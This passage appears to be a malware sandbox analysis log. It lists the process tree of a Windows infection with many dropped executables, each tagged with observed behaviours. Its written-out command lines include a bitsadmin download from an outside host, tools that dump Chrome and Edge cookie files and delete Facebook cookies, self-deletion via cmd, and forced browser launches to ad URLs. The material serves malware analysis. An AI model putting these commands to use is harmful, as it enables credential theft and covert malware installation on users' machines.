C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1080 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2140,3795813787212672934,11192943876245618300,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:85⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3948 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3948 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\TmkGCvXufEjdq7bBSflS1DJU.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 39485⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\mJimMqtn6WWB9vVWN43v00Qa.exe"C:\Users\Admin\Documents\mJimMqtn6WWB9vVWN43v00Qa.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 3123⤵
- Program crash
-
C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe"C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\52gsIfQbxcku44ZeI8702OJN.exe"C:\Users\Admin\Documents\52gsIfQbxcku44ZeI8702OJN.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe"C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe"C:\Users\Admin\Documents\wXv39P__TJcA2k12V2Zgx03I.exe" -q3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1U9482xac9Vdw81qeLADoS78.exe"C:\Users\Admin\Documents\1U9482xac9Vdw81qeLADoS78.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\sItBlTP8i4E25HX__m218TGK.exe"C:\Users\Admin\Documents\sItBlTP8i4E25HX__m218TGK.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\mvaT_YqO7KekkPxnX5BA4Fiz.exe"C:\Users\Admin\Documents\mvaT_YqO7KekkPxnX5BA4Fiz.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 2043⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\HsB706rZ5ITpXQS1ycIHz9Ks.exe"C:\Users\Admin\Documents\HsB706rZ5ITpXQS1ycIHz9Ks.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x64.exe /install /quiet3⤵
-
C:\Users\Admin\Documents\VC_redist.x64.exeVC_redist.x64.exe /install /quiet4⤵
-
C:\Windows\Temp\{7CC027BF-0455-4AE1-B58F-E8BED6F95628}\.cr\VC_redist.x64.exe"C:\Windows\Temp\{7CC027BF-0455-4AE1-B58F-E8BED6F95628}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=560 /install /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Temp\{47FCA022-D2C1-4EF8-B93C-50C787A80F42}\.be\VC_redist.x64.exe"C:\Windows\Temp\{47FCA022-D2C1-4EF8-B93C-50C787A80F42}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{10DD3A21-7C7E-42EA-81E7-BF30E57F9270} {CBF76BDB-FE66-424D-9790-F178027040B6} 39326⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 9126⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x86.exe /install /quiet3⤵
-
C:\Users\Admin\Documents\VC_redist.x86.exeVC_redist.x86.exe /install /quiet4⤵
-
C:\Windows\Temp\{6E3C1040-B6A8-474A-8633-5F3F0CCC9D03}\.cr\VC_redist.x86.exe"C:\Windows\Temp\{6E3C1040-B6A8-474A-8633-5F3F0CCC9D03}\.cr\VC_redist.x86.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x86.exe" -burn.filehandle.attached=552 -burn.filehandle.self=668 /install /quiet5⤵
- Loads dropped DLL
-
C:\Windows\Temp\{392245DB-C178-491E-B130-873ADE003C3D}\.be\VC_redist.x86.exe"C:\Windows\Temp\{392245DB-C178-491E-B130-873ADE003C3D}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{9A05BE42-A93B-4A19-99E8-ACF3636B130B} {DD46DA39-DE96-4E6E-8A42-5BEA522B4770} 60286⤵
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6028 -s 14206⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-J8S89.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-J8S89.tmp\installer.tmp" /SL5="$802FE,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 13004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 13524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\1P2iyh2JidvGFh4oERonoUp_.exe"C:\Users\Admin\Documents\1P2iyh2JidvGFh4oERonoUp_.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAE68.tmp\tempfile.ps1"3⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z3⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\8EiYpKhDEcXgXVlhx5Kwkd8q.exe"C:\Users\Admin\Documents\8EiYpKhDEcXgXVlhx5Kwkd8q.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1996 -ip 19961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\is-F65JB.tmp\8EiYpKhDEcXgXVlhx5Kwkd8q.tmp"C:\Users\Admin\AppData\Local\Temp\is-F65JB.tmp\8EiYpKhDEcXgXVlhx5Kwkd8q.tmp" /SL5="$10278,138429,56832,C:\Users\Admin\Documents\8EiYpKhDEcXgXVlhx5Kwkd8q.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-0C7G7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0C7G7.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 2364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-432K6.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-432K6.tmp\MediaBurner2.tmp" /SL5="$10354,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-HRK7P.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-HRK7P.tmp\3377047_logo_media.exe" /S /UID=burnerch25⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Reference Assemblies\PYCWJQLODX\ultramediaburner.exe"C:\Program Files\Reference Assemblies\PYCWJQLODX\ultramediaburner.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3L2FJ.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-3L2FJ.tmp\ultramediaburner.tmp" /SL5="$9026A,281924,62464,C:\Program Files\Reference Assemblies\PYCWJQLODX\ultramediaburner.exe" /VERYSILENT7⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu8⤵
-
C:\Users\Admin\AppData\Local\Temp\5a-1e6ca-bc4-c9fa2-20ff7492e3150\Tyshywaecucae.exe"C:\Users\Admin\AppData\Local\Temp\5a-1e6ca-bc4-c9fa2-20ff7492e3150\Tyshywaecucae.exe"6⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e67⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde62a46f8,0x7ffde62a4708,0x7ffde62a47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4464 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,15805505599946007467,15408049450875112237,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5288 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,9055095733945903782,3354374047673502159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514837⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515137⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872157⤵
-
